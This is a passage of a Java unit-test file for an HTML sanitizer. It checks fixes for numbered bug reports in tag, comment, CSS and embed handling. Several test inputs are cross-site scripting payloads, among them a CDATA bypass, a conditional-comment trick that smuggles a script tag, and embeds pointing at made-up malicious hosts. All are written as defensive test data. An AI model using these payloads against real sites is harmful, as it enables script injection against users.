for (int i = 0; i < BASE64_BAD_XML_STRINGS.length; i++) { | |
String testStr = new String( | |
Base64.decodeBase64(BASE64_BAD_XML_STRINGS[i]), | |
"UTF-8"); | |
sanitize(testStr); | |
sanitize(testStr); | |
} | |
// These fail in AntiSamy due to a bug in NekoHTML | |
assertEquals( | |
"<a href=\"http://www.test.com\" rel=\"nofollow\"></a>", | |
sanitize("<a . href=\"http://www.test.com\">")); | |
assertEquals( | |
"<a href=\"http://www.test.com\" rel=\"nofollow\"></a>", | |
sanitize("<a - href=\"http://www.test.com\">")); | |
assertTrue(sanitize("<style>") != null); | |
} | |
public void testPreviousBugs() throws Exception { | |
/* | |
* issues 12 (and 36, which was similar). empty tags cause display | |
* problems/"formjacking" | |
*/ | |
{ | |
Pattern p = Pattern.compile(".*<strong(\\s*)/>.*", Pattern.DOTALL); | |
String s1 = sanitize("<br ><strong></strong><a>hello world</a><b /><i/><hr>"); | |
String s2 = sanitize("<br ><strong></strong><a>hello world</a><b /><i/><hr>"); | |
assertFalse(p.matcher(s1).matches()); | |
p = Pattern.compile(".*<b(\\s*)/>.*"); | |
assertFalse(p.matcher(s1).matches()); | |
assertFalse(p.matcher(s2).matches()); | |
p = Pattern.compile(".*<i(\\s*)/>.*"); | |
assertFalse(p.matcher(s1).matches()); | |
assertFalse(p.matcher(s2).matches()); | |
p = Pattern.compile(".*<hr(\\s*)/>.*"); | |
assertFalse(p.matcher(s1).matches()); | |
assertFalse(p.matcher(s2).matches()); | |
} | |
/* issue #20 */ | |
assertSanitizedDoesNotContain("<b><i>Some Text</b></i>", "<i />"); | |
assertSanitizedDoesNotContain("<b><i>Some Text</b></i>", "<i />"); | |
/* issue #25 */ | |
assertEquals( | |
"<div>Test</div>", sanitize("<div style=\"margin: -5em\">Test</div>")); | |
/* issue #28 */ | |
assertSanitizedDoesContain( | |
"<div style=\"font-family: Geneva, Arial, courier new, sans-serif\">Test</div>", | |
"font-family:'geneva' , 'arial' , 'courier new' , sans-serif"); | |
/* issue #29 - missing quotes around properties with spaces */ | |
if (RUN_KNOWN_FAILURES) { | |
String s = "<style type=\"text/css\"><![CDATA[P {\n font-family: \"Arial Unicode MS\";\n}\n]]></style>"; | |
assertEquals(s, sanitize(s)); | |
} | |
/* issue #30 */ | |
if (RUN_KNOWN_FAILURES) { | |
String s = "<style type=\"text/css\"><![CDATA[P { margin-bottom: 0.08in; } ]]></style>"; | |
s = sanitize(s); | |
// followup - does the patch fix multiline CSS? | |
String s2 = "<style type=\"text/css\"><![CDATA[\r\nP {\r\n margin-bottom: 0.08in;\r\n}\r\n]]></style>"; | |
assertEquals("<style type=\"text/css\"><![CDATA[P {\n\tmargin-bottom: 0.08in;\n}\n]]></style>", sanitize(s2)); | |
// next followup - does non-CDATA parsing still work? | |
String s3 = "<style>P {\n\tmargin-bottom: 0.08in;\n}\n"; | |
assertEquals("<style>P {\n\tmargin-bottom: 0.08in;\n}\n</style>\n", sanitize(s3)); | |
// for other | |
// tests | |
} | |
/* issue #32 - nekos problem */ | |
{ | |
String s = "<SCRIPT =\">\" SRC=\"\"></SCRIPT>"; | |
sanitize(s); | |
sanitize(s); | |
} | |
/* issue #37 - OOM */ | |
{ | |
String dirty = "<a onblur=\"try {parent.deselectBloggerImageGracefully();}" + "catch(e) {}\"" | |
+ "href=\"http://www.charityadvantage.com/ChildrensmuseumEaston/images/BookswithBill.jpg\"><img" + "style=\"FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 150px; CURSOR:" | |
+ "hand; HEIGHT: 100px\" alt=\"\"" + "src=\"http://www.charityadvantage.com/ChildrensmuseumEaston/images/BookswithBill.jpg\"" | |
+ "border=\"0\" /></a><br />Poor Bill, couldn't make it to the Museum's <span" + "class=\"blsp-spelling-corrected\" id=\"SPELLING_ERROR_0\">story time</span>" | |
+ "today, he was so busy shoveling! Well, we sure missed you Bill! So since" + "ou were busy moving snow we read books about snow. We found a clue in one" | |
+ "book which revealed a snowplow at the end of the story - we wish it had" + "driven to your driveway Bill. We also read a story which shared fourteen" | |
+ "<em>Names For Snow. </em>We'll catch up with you next week....wonder which" + "hat Bill will wear?<br />Jane"; | |
String s = sanitize(dirty); | |
assertNotNull(s); | |
} | |
/* issue #38 - color problem/color combinations */ | |
{ | |
String s = "<font color=\"#fff\">Test</font>"; | |
String expected = "<font color=\"#fff\">Test</font>"; | |
assertEquals(expected, sanitize(s)); | |
assertEquals(expected, sanitize(s)); | |
s = "<div style=\"color: #fff\">Test 3 letter code</div>"; | |
expected = "<div style=\"color:#fff\">Test 3 letter code</div>"; | |
assertEquals(expected, sanitize(s)); | |
assertEquals(expected, sanitize(s)); | |
s = "<font color=\"red\">Test</font>"; | |
expected = "<font color=\"red\">Test</font>"; | |
assertEquals(expected, sanitize(s)); | |
assertEquals(expected, sanitize(s)); | |
s = "<font color=\"neonpink\">Test</font>"; | |
expected = s; | |
assertEquals(expected, sanitize(s)); | |
assertEquals(expected, sanitize(s)); | |
if (RUN_KNOWN_FAILURES) { | |
s = "<font color=\"#0000\">Test</font>"; | |
expected = "<font>Test</font>"; | |
assertEquals(expected, sanitize(s)); | |
assertEquals(expected, sanitize(s)); | |
} | |
if (RUN_KNOWN_FAILURES) { | |
s = "<div style=\"color: #0000\">Test</div>"; | |
expected = "<div>Test</div>"; | |
assertEquals(expected, sanitize(s)); | |
assertEquals(expected, sanitize(s)); | |
} | |
s = "<font color=\"#000000\">Test</font>"; | |
expected = "<font color=\"#000000\">Test</font>"; | |
assertEquals(expected, sanitize(s)); | |
assertEquals(expected, sanitize(s)); | |
s = "<div style=\"color: #000000\">Test</div>"; | |
expected = "<div style=\"color:#000000\">Test</div>"; | |
assertEquals(expected, sanitize(s)); | |
assertEquals(expected, sanitize(s)); | |
s = "<b><u>foo<style><script>alert(1)</script></style>@import 'x';</u>bar"; | |
sanitize(s); | |
} | |
/* issue #40 - handling <style> media attributes right */ | |
if (RUN_KNOWN_FAILURES) { | |
assertSanitizedDoesContain("<style media=\"print, projection, screen\"> P { margin: 1em; }</style>", "print, projection, screen"); | |
} | |
/* issue #41 - comment handling */ | |
{ | |
assertEquals("text ", sanitize("text <!-- comment -->")); | |
assertEquals("text ", sanitize("text <!-- comment -->")); | |
assertEquals("<div>text </div>", sanitize("<div>text <!-- comment --></div>")); | |
assertEquals("<div>text </div>", sanitize("<div>text <!-- comment --></div>")); | |
assertEquals("<div>text </div>", sanitize("<div>text <!--[if IE]> comment <[endif]--></div>")); | |
assertEquals("<div>text </div>", sanitize("<div>text <!--[if IE]> comment <[endif]--></div>")); | |
/* | |
* Check to see how nested conditional comments are handled. This is | |
* not very clean but the main goal is to avoid any tags. Not sure | |
* on encodings allowed in comments. | |
*/ | |
String input = "<div>text <!--[if IE]> <!--[if gte 6]> comment <[endif]--><[endif]--></div>"; | |
String expected = "<div>text <[endif]--></div>"; | |
String output = sanitize(input); | |
assertEquals(expected, output); | |
input = "<div>text <!--[if IE]> <!--[if gte 6]> comment <[endif]--><[endif]--></div>"; | |
expected = "<div>text <[endif]--></div>"; | |
output = sanitize(input); | |
assertEquals(expected, output); | |
/* | |
* Regular comment nested inside conditional comment. Test makes | |
* sure | |
*/ | |
assertEquals("<div>text comment <[endif]--></div>", sanitize("<div>text <!--[if IE]> <!-- IE specific --> comment <[endif]--></div>")); | |
/* | |
* These play with whitespace and have invalid comment syntax. | |
*/ | |
assertEquals("<div>text </div>", sanitize("<div>text <!-- [ if lte 6 ]>\ncomment <[ endif\n]--></div>")); | |
assertEquals("<div>text comment </div>", sanitize("<div>text <![if !IE]> comment <![endif]></div>")); | |
assertEquals("<div>text comment </div>", sanitize("<div>text <![ if !IE]> comment <![endif]></div>")); | |
String attack = "[if lte 8]<script>"; | |
String spacer = "<![if IE]>"; | |
StringBuffer sb = new StringBuffer(); | |
sb.append("<div>text<!"); | |
for (int i = 0; i < attack.length(); i++) { | |
sb.append(attack.charAt(i)); | |
sb.append(spacer); | |
} | |
sb.append("<![endif]>"); | |
String s = sb.toString(); | |
assertSanitizedDoesNotContain(s, "<script"); | |
assertSanitizedDoesNotContain(s, "<script"); | |
} | |
/* | |
* issue #44 - childless nodes of non-allowed elements won't cause an error | |
*/ | |
{ | |
String s = "<iframe src='http://foo.com/'></iframe>" + "<script src=''></script>" + "<link href='/foo.css'>"; | |
assertEquals(s, "", sanitize(s)); | |
} | |
/* issue #51 - offsite urls with () are found to be invalid */ | |
assertSanitizedDoesNotContain( | |
"<a href='http://subdomain.domain/(S(ke0lpq54bw0fvp53a10e1a45))/MyPage.aspx'>test</a>", "("); | |
/* issue #56 - unnecessary spaces */ | |
{ | |
String s = "<SPAN style='font-weight: bold;'>Hello World!</SPAN>"; | |
assertEquals( | |
"<span style=\"font-weight:bold\">Hello World!</span>", | |
sanitize(s)); | |
} | |
/* issue #58 - input not in list of allowed-to-be-empty tags */ | |
{ | |
String s = "tgdan <input/> g h"; | |
assertEquals("tgdan g h", sanitize(s)); | |
} | |
/* issue #61 - input has newline appended if ends with an accepted tag */ | |
{ | |
String dirtyInput = "blah <b>blah</b>."; | |
String s = sanitize(dirtyInput); | |
assertEquals(dirtyInput, s); | |
} | |
/* issue #69 - char attribute should allow single char or entity ref */ | |
{ | |
String s = "<td char='.'>test</td>"; | |
assertSanitizedDoesContain(s, "char"); | |
assertSanitizedDoesContain(s, "char"); | |
s = "<td char='..'>test</td>"; | |
assertSanitizedDoesNotContain(s, "char"); | |
assertSanitizedDoesNotContain(s, "char"); | |
s = "<td char='"'>test</td>"; | |
assertSanitizedDoesContain(s, "char"); | |
assertSanitizedDoesContain(s, "char"); | |
s = "<td char='"a'>test</td>"; | |
assertSanitizedDoesNotContain(s, "char"); | |
assertSanitizedDoesNotContain(s, "char"); | |
s = "<td char='"&'>test</td>"; | |
assertSanitizedDoesNotContain(s, "char"); | |
assertSanitizedDoesNotContain(s, "char"); | |
} | |
/* privately disclosed issue - cdata bypass */ | |
{ | |
String malInput = "<![CDATA[]><script>alert(1)</script>]]>"; | |
assertSanitizedDoesNotContain(malInput, "<script"); | |
} | |
/* this test is for confirming literal-lists work as | |
* advertised. it turned out to be an invalid / non- | |
* reproducible bug report but the test seemed useful | |
* enough to keep. | |
*/ | |
{ | |
String malInput = "hello<p align='invalid'>world</p>"; | |
assertSanitizedDoesNotContain(malInput, "invalid"); | |
String goodInput = "hello<p align='left'>world</p>"; | |
if (RUN_KNOWN_FAILURES) { | |
assertSanitizedDoesContain(goodInput, "left"); | |
} | |
} | |
} | |
/* | |
* Tests cases dealing with nofollowAnchors directive. Assumes anchor tags | |
* have an action set to "validate" (may be implicit) in the policy file. | |
*/ | |
public void testNofollowAnchors() throws Exception { | |
// adds when not present | |
assertSanitized("<a href=\"blah\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>"); | |
// adds properly even with bad attr | |
assertSanitized("<a href=\"blah\" bad=\"true\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>"); | |
// rel with bad value gets corrected | |
assertSanitized("<a href=\"blah\" rel=\"blh\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>"); | |
// correct attribute doesnt get messed with | |
assertSanitized("<a href=\"blah\" rel=\"nofollow\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>"); | |
// if two correct attributes, only one remaining after scan | |
assertSanitized("<a href=\"blah\" rel=\"nofollow\" rel=\"nofollow\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>"); | |
// test if value is off - does it add? | |
assertSanitizedDoesNotContain("a href=\"blah\">link</a>", "nofollow"); | |
} | |
public void testValidateParamAsEmbed() throws Exception { | |
// let's start with a YouTube embed | |
String input = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\"></param><param name=\"allowFullScreen\" value=\"true\"></param><param name=\"allowscriptaccess\" value=\"always\"></param><embed src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>"; | |
String expectedOutput = "<object height=\"340\" width=\"560\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" /><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><embed allowfullscreen=\"true\" allowscriptaccess=\"always\" height=\"340\" src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" type=\"application/x-shockwave-flash\" width=\"560\" /></object>"; | |
if (RUN_KNOWN_FAILURES) { | |
assertSanitizedDoesContain(input, expectedOutput); | |
} else { | |
assertSanitized(input, ""); | |
} | |
String saxExpectedOutput = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\"><param name=\"allowFullScreen\" value=\"true\"><param name=\"allowscriptaccess\" value=\"always\"><embed src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>"; | |
if (RUN_KNOWN_FAILURES) { | |
assertSanitizedDoesContain(input, saxExpectedOutput); | |
} else { | |
assertSanitized(input, ""); | |
} | |
// now what if someone sticks malicious URL in the value of the | |
// value attribute in the param tag? remove that param tag | |
input = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://supermaliciouscode.com/badstuff.swf\"></param><param name=\"allowFullScreen\" value=\"true\"></param><param name=\"allowscriptaccess\" value=\"always\"></param><embed src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>"; | |
expectedOutput = "<object height=\"340\" width=\"560\"><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><embed allowfullscreen=\"true\" allowscriptaccess=\"always\" height=\"340\" src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" type=\"application/x-shockwave-flash\" width=\"560\" /></object>"; | |
saxExpectedOutput = "<object width=\"560\" height=\"340\"><param name=\"allowFullScreen\" value=\"true\"><param name=\"allowscriptaccess\" value=\"always\"><embed src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>"; | |
if (RUN_KNOWN_FAILURES) { | |
assertSanitizedDoesContain(input, expectedOutput); | |
} else { | |
assertSanitized(input, ""); | |
} | |
if (RUN_KNOWN_FAILURES) { | |
assertTrue(sanitize(input).equals(saxExpectedOutput)); | |
} else { | |
assertSanitized(input, ""); | |
} | |
// now what if someone sticks malicious URL in the value of the src | |
// attribute in the embed tag? remove that embed tag | |
input = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\"></param><param name=\"allowFullScreen\" value=\"true\"></param><param name=\"allowscriptaccess\" value=\"always\"></param><embed src=\"http://hereswhereikeepbadcode.com/ohnoscary.swf\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>"; | |
expectedOutput = "<object height=\"340\" width=\"560\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" /><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /></object>"; | |
saxExpectedOutput = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\"><param name=\"allowFullScreen\" value=\"true\"><param name=\"allowscriptaccess\" value=\"always\"></object>"; | |
if (RUN_KNOWN_FAILURES) { | |
assertSanitizedDoesContain(input, expectedOutput); | |
} else { | |
assertSanitized(input, ""); | |
} | |
if (RUN_KNOWN_FAILURES) { | |
assertSanitizedDoesContain(input, saxExpectedOutput); | |
} else { | |
assertSanitized(input, ""); | |
} | |
} | |
private static void assertSanitizedDoesNotContain( | |
String html, String dangerousContent) { | |
String sanitized = sanitize(html); | |
int index = Strings.toLowerCase(sanitized).indexOf( | |
Strings.toLowerCase(dangerousContent)); | |
assertEquals( | |
"`" + sanitized + "` from `" + html + "` contains `" + | |
dangerousContent + "`", | |
-1, index); | |
} | |
private static void assertSanitizedDoesContain( | |
String html, String dangerousContent) { | |
String sanitized = sanitize(html); | |
int index = Strings.toLowerCase(sanitized).indexOf( | |
Strings.toLowerCase(dangerousContent)); | |
assertTrue( | |
"`" + sanitized + "` from `" + html + "` does not contain `" + | |
dangerousContent + "`", | |
index >= 0); | |
} | |
private static void assertSanitized(String html, String sanitized) { | |
assertEquals(sanitized, sanitize(html)); | |
} | |
private static String guessCharsetFromContentType(String contentType) { | |
Matcher m = Pattern.compile(";\\s*charset=(?:\"([^\"]*)\"|([^\\s;]*))") | |
.matcher(contentType); | |
if (m.find()) { | |
String ct; | |
ct = m.group(1); | |
if (ct != null) { return ct; } | |
ct = m.group(2); | |
if (ct != null) { return ct; } | |
} | |
return "UTF-8"; | |
} | |
} |